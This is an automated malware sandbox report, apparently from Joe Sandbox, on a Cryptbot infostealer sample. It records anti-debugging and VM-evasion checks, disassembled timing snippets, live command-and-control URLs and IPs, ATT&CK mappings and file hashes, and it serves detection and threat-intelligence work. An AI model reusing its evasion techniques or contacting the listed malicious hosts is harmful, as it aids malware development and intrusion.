Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74004AF second address: 74004DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F262D38FB0Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74004DC second address: 74004EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov eax, 3147FE0Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 74004EE second address: 7400530 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F262D38FB10h 0x0000000f sub cl, FFFFFFE8h 0x00000012 jmp 00007F262D38FB0Bh 0x00000017 popfd 0x00000018 mov dx, si 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F262D38FB11h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7400530 second address: 7400536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7400536 second address: 740053A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Special instruction interceptor: First address: D2FA57 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Special instruction interceptor: First address: EF9A8A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Special instruction interceptor: First address: F5E9EE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\B43WRnzSPD.exe TID: 3560 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\Desktop\B43WRnzSPD.exe TID: 3184 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\Desktop\B43WRnzSPD.exe TID: 2868 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\Desktop\B43WRnzSPD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Code function: 1_2_0060255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0060255D
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Code function: 1_2_006029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_006029FF
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: B43WRnzSPD.exe, 00000001.00000003.1576592207.00000000018C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: B43WRnzSPD.exe Binary or memory string: Hyper-V RAW
Source: B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: B43WRnzSPD.exe, 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: B43WRnzSPD.exe, 00000001.00000002.2020839491.0000000001925000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.1912517662.00000000018EB000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2017988366.0000000001913000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018071816.0000000001920000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: B43WRnzSPD.exe, 00000001.00000003.1579083944.0000000006C21000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: C:\Users\user\Desktop\B43WRnzSPD.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\B43WRnzSPD.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\B43WRnzSPD.exe File opened: NTICE
Source: C:\Users\user\Desktop\B43WRnzSPD.exe File opened: SICE
Source: C:\Users\user\Desktop\B43WRnzSPD.exe File opened: SIWVID
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Process queried: DebugPort
Source: B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\B43WRnzSPD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.8:49706 -> 185.121.15.192:80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 741 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
B43WRnzSPD.exe | 100% | Avira | TR/Crypt.TPM.Gen
B43WRnzSPD.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument= | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQ | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3 | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | 100% | Avira URL Cloud | malware
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.twentytk20ht.top | 185.121.15.192 | true | false | | high
httpbin.org | 98.85.100.80 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.twentytk20ht.top/TQ | B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument= | B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2020839491.0000000001925000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018015700.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018386317.00000000018C7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020572030.00000000018C8000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2017988366.0000000001913000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018071816.0000000001920000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018361388.0000000001924000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://httpbin.org/ipbefore | B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | B43WRnzSPD.exe, B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | B43WRnzSPD.exe | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3 | B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850fd4 | B43WRnzSPD.exe, 00000001.00000003.2018790782.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000003.2018770520.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, B43WRnzSPD.exe, 00000001.00000002.2020371855.00000000018B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/alt-svc.html | B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850 | B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | B43WRnzSPD.exe, 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, B43WRnzSPD.exe, 00000001.00000003.1538093856.0000000007670000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.twentytk20ht.top | Spain | 207046 | REDSERVICIOES | false
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579965
Start date and time:2024-12-23 17:14:13 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 11s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:B43WRnzSPD.exe
renamed because original name is a hash value
Original Sample Name:76e5a31451eefe694a963ae5b65ecff2.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: B43WRnzSPD.exe
Time | Type | Description
11:15:53 | API Interceptor | 114x Sleep call for process: B43WRnzSPD.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.121.15.192 | foQJ23jqNw.exe | malicious | Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | dWGmbwk5xy.exe | malicious | Clipboard Hijacker, Cryptbot | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
185.121.15.192 | jId3ER7NuY.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | 6vNMeuQvlu.exe | malicious | Clipboard Hijacker, Cryptbot | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
185.121.15.192 | y0LmNhvotP.exe | malicious | Clipboard Hijacker, Cryptbot | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
185.121.15.192 | qlo1CDVCSf.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | 6dPpCeWDig.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | kFrGefsAK3.exe | malicious | Cryptbot | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
185.121.15.192 | AD4q0qFvM8.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | n1HBga77I1.exe | malicious | Clipboard Hijacker, Cryptbot | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
98.85.100.80 | foQJ23jqNw.exe | malicious | Cryptbot |
98.85.100.80 | jId3ER7NuY.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | 6vNMeuQvlu.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | y0LmNhvotP.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | AD4q0qFvM8.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | n1HBga77I1.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | 4je7za5c0V.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | rGABp2MFj4.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | x20bbVN4LA.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | crhRJnVd08.exe | malicious | Clipboard Hijacker, Cryptbot |
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                httpbin.orgfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 98.85.100.80
                                                dWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.226.108.155
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.226.108.155
                                                6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.226.108.155
                                                kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                • 34.226.108.155
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                home.twentytk20ht.topfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                rGABp2MFj4.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                DP3m5O6yk5.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                pivGJnn6wN.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TWC-11351-NORTHEASTUSfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 98.85.100.80
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                4je7za5c0V.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                rGABp2MFj4.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                x20bbVN4LA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                crhRJnVd08.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 98.85.100.80
                                                REDSERVICIOESfoQJ23jqNw.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192
                                                dWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                jId3ER7NuY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                6vNMeuQvlu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                y0LmNhvotP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                • 185.121.15.192
                                                AD4q0qFvM8.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                n1HBga77I1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 185.121.15.192
                                                No context
                                                No context
                                                No created / dropped files found
                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.98594099143931
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:B43WRnzSPD.exe
                                                File size:4'441'600 bytes
                                                MD5:76e5a31451eefe694a963ae5b65ecff2
                                                SHA1:5517f0db4c84c605574c618567afa40274a1c7a1
                                                SHA256:3955f6fc16ce4d34bd50409f6f98825d3568e370f9f980d8e82dfbe8d7dbd04c
                                                SHA512:f41bde7c9e23383764f75b65c76f45bd9e9a939be4b6b72b92bbe2873a7b5ecaa73d6fbb62963378210698a93c5efea2908fc5d055dc24b3a83036ae03bd06c1
                                                SSDEEP:98304:2sIqNwZ5U5iJNRlqsew37aBGv+kxz3eBtjIaAdG2qkZ:2sIqNwZ5U5ih1ew37aBGvhzcDQ
                                                TLSH:E42633E76C776041F91FCE7AD98AD1A44390E8C50D8EEE9B280769F2344F13638459AF
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@...................................D...@... ............................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x106b000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:DYNAMIC_BASE
                                                Time Stamp:0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                Instruction
                                                jmp 00007F262D3806EAh
                                                shld dword ptr [ebx+00h], eax, 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x72b05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72a000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc690cc | 0x10 | acnazlro
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc6907c | 0x18 | acnazlro
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(empty) | 0x1000 | 0x729000 | 0x283400 | d2a8da05469a2ea6be7b29f7b8c5cb0e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x72a000 | 0x2b0 | 0x200 | 4983618d2ed48cd7239320849b8354d5 | False | 0.798828125 | data | 6.091720857337653 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x72b000 | 0x1000 | 0x200 | d6de82d14e357527731a70b0d9d5c0e8 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
